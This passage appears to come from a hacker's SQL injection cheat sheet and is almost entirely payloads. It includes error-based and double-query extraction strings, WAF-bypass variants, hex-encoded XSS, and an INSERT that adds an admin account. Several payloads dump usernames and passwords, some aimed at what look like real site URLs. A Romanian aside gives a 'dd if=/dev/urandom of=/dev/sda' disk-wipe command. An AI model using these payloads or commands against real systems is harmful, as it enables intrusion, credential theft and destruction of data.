- (0)*2))x from information_schema.tables group
- by x)a)
- Double Query for Database Extraction:
- and(select 1 from(select count(*),concat((select
- (select concat(0x7e,0×27,cast(database() as
- char),0×27,0x7e)) from information_sch
- ema.tables limit 0,1),floor(rand(0)*2))x from
- information_schema.tables group by x)a) and 1=1
- and(select 1 from(select count(*),concat((select
- (select (SELECT distinct
- concat(0x7e,0×27,cast(schema_name as
- char),0×27,0x7e) FROM information_sch
- ema.schemata LIMIT N,1)) from
- information_schema.tables limit 0,1),floor(rand
- (0)*2))x from information_schema.tables group
- by x)a) and 1=1
- and(select 1 from(select count(*),concat((select
- (select (SELECT distinct
- concat(0x7e,0×27,cast(table_name as
- char),0×27,0x7e) FROM information_sch
- ema.tables Where
- table_schema=0xhex_code_of_database_name
- LIMIT N,1)) from information_schema.tables limit
- 0,1),floor(rand(0)*2))x from
- information_schema.tables group by x)a) and 1
- ==============================
- ==============================
- ==============================
- =========================================
- WUBI +and+extractvalue(rand(),concat(0x3e,
- (select+concat(username,0x7e,password)+from
- +iw_users+limit+0,1)))–+
- ==============================
- ==============================
- ==============================
- =========================================
- Descarci orice linux live, bootezi dupa el si
- formatezi cu dd+urandom. De acolo nu mai
- recupereaza NIMENI ceva.
- Code: dd if=/dev/urandom of=/dev/sda bs=1M
- I’d say using concat(0xY)
- Y being ‘<script>alert(‘Text here’);</script>’ in
- hex
- union select concat(version,0x3c73637269707
- 43e616c6572742827706833776c272
- 93c2f7363726970743e)
- http://zerocoolhf.altervista.org/level2.php?id=-1
- %27%20union%20select%20*%20from
- %28%28select%201%29a%20join%20%28select
- %20version%28%29%29b%20join%20%28select
- %20database%28%29%29c%29 –+
- union select 1,group_concat(column_name),3
- FROM information_schema.columns WHERE
- table_name=concat(’0x’, hex(‘users’)
- =113′+and+0+union+select+1,(SELECT (@)
- FROM (SELECT(@:=0×00),(SELECT (@) FROM
- (information_schema.columns) WHERE
- (table_schema>=@) AND (@)IN (@:=CONCAT
- (@,0x3C7363726970743E616C6572742827
- ,’ [ ',table_schema,' ] >’,table_name,’ >
- ‘,column_name,0x27293B3C2F7363
- 726970743E))))x),3–+–
- injection in sql database: add new user
- INSERT INTO admins (`name`,`password`,`email`)
- VALUES (‘unix’,'unixunix’,'unix_chro@
- yahoo.com’)
- +and+(select+1+from+(select+count(*),concat((
- select(select+concat(cast(table_nam e+as
- +char),0x7e))+from+information_schema.tables
- +where+table_schema=0xDATABASEHE X+limit
- +0,1),floor(rand(0)*2))x+from+informat
- ion_schema.tables+group+by+x)a)
- CHALLENGES
- Code:
- =(13)and(0)union(select(1),group_concat(colum
- n_name,0x3c62723e),(3)from(inf
- ormation_schema.columns)where(
- table_schema=database())and(ta
- ble_name=0×7365637572697479))–+-
- =12+and+false/*!union*/ /*!select*/
- 1,group_concat(0x3c62723e,/*!TabLe_NaMe*/
- ),2,concat(user(),0x2a,database(),0x2a,version
- ()),13,0x3c666f6e7420636f6c6f7
- 23d626c75653e3c68323e706833776c,15 from
- information_schema.tables where
- table_schema=0x66616272697a696
- f5f636572697070 LiMit 0,1–
- =/*!uNiOn*/ /*!SeLeCt*/ 1,concat(/*!version
- (),0x3a,0x3a,AdMinLoGiN,0x3a,0x3a*/),3 /*!
- fRoM*/ security–
- =121)+and(0)+/*!uNion*/+/*!seleCt*/
- +1,2,3,4,version(),6,7– -
- =121)/**/and false UNION(SELECT
- 1,2,3,4,5,6,7)–+-
- =121 div 0 ) /*!UNION*/ /*!SELECT*/
- 1,2,3,4,5,6,version()# |
- null’+union+select+1,2,count(schema_name),4,5
- +from+information_schema.schemata– x
- ==============================
- ==============================
- ==============================
- =========================================
- Error Based:
- ==============================
- ==============================
- ==============================
- =========================================
- +or+1+group+by+concat_ws(0x7e,version(),floor
- (rand(0)*2))+having+min(0)+or+1–
- or 1 group by concat(0x3a,(select substr
- (group_concat(username,0x3a,password),1,150)
- from rmdsz_user),floor(rand(0)*2)) having min(0)
- or 1– -
- or 1 group by concat_ws(0x7e,version(),floor
- (rand(0)*2)) having min(0) or 1 — -
- and (select 1 from (select count(*),concat((select
- (select concat(cast(database() as char),0x7e))
- from information_schema.tables where
- table_schema=database() limit 0,1),floor(rand
- (0)*2))x from information_schema.tables group
- by x)a)
- +AND(SELECT COUNT(*) FROM (SELECT 1 UNION
- SELECT null UNION SELECT !1)x GROUP by
- CONCAT((SELECT version() FROM
- information_schema.tables LIMIT 0,1),FLOOR
- (RAND(0)*2)))
- +and+(select+1+from+(select+count(*)+from+(se
- lect+1+union+select+2+union+select+ 3)x+group
- +by+concat(mid((select+concat_ws(0x7
- e,version(),0x7e)+from+information_
- schema.tables+limit+0,1),1,25),floor(rand(0)*
- 2)))a)– x
- or 1=convert(int,(@@version))-
- +or+1+group+by+concat_ws(0x7e,version(),floor
- (rand(0)*2))+having+min(0)+or+1–
- +and+(select+1+from+(select+count(*),concat((
- select(select+concat(c ast(count(schem
- a_name)+as+char),0x7e))+from+i
- nformation_schema.schemata+limit+0, 1),floor
- (rand(0)*2))x+from+information_schema.tables
- +group+by+x)a)
- (42)and(0)union(select(1),2,version(),4,5,0x3
- c623e3c666f6e7420636f6c6f723d6
- 26c75653e706833776c,7,8,9,(10))–+-
- ==============================
- ==============================
- ==============================
- =========================================
- WAF BYPASS BY TOTTI
- ==============================
- ==============================
- ==============================
- =========================================
- =-2/*1337*/UNION/*1337*/(SELECT/*1337*/
- 1337,concat_ws(0x203a20,0x746f7
- 474693933,table_nam e)/*1337*/FROM/*1337*/
- INFORMATION_SCHEMA./*!TABLES*//*1337*/
- WHERE/*1337*/TABLE_SCHEMA=database())– -
- =2+and(0)+union+distinctROW+select+1,/*!
- 50000CoNcaT*/(0x706833776c,0x
- 3a,table_name) /*!froM*/ /*!InfORmaTion_sc
- Hema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/
- =database()– -
- ==============================
- ==============================
- ==============================
- =========================================
- WUBI – 1,(select(@x)from(select(@x:=0×00),
- (select(0)from(information_schema.column
- s)where(table_schema!=0×69)and(0×00)in
- (@x:=concat(@x,0x3c62723e,table_schem
- a,0x2020203d3e3e202020,table_n
- ame,0x20203a3a3a32020,column_n
- ame))))x),3,4–
- (select (@) from (select(@:=0×00),(select (@)
- from (information_schema.columns) where
- (table_schema>=@) and (@)in (@:=concat(@,0x
- 0a,’ [ ',table_schema,' ] >’,table_name,’ >
- ‘,column_name))))x)
- (select (@) from (select (@x:=0×00),(select (@)
- from (database.table) where (@) in (@:=concat
- (@,0x0a,columns)))x)
- (select (@) from (select (@x:=0×00),(select (@)
- from (database.table) where (@) in (@:=concat
- (@,0x0a,columns)))x)
- ==============================
- ==============================
- ==============================
- =========================================
- +and+1=convert(int,SERVERPROPERTY
- (‘ProductVersion’))
- ==============================
- ==============================
- ==============================
- =========================================
- http://zerofreak.blogspot.it/2012/02/tutorial-by-
- zer0freak-zer0freak-sqli.html
- http://www.websec.ca/kb/sql_injection
- http://www.hellboundhackers.org/articles/862-
- mysql-injection-complete-tutorial.html
- ==============================
- ==============================
- ==============================
- =========================================
- test
- http://www.mt.ro/nou/articol.php?id=-
- angajari’+and+extractvalue(rand(),concat(0x3e,
- (select+concat(username,0x7e,password)+from
- +iw_users+limit+0,1)))–+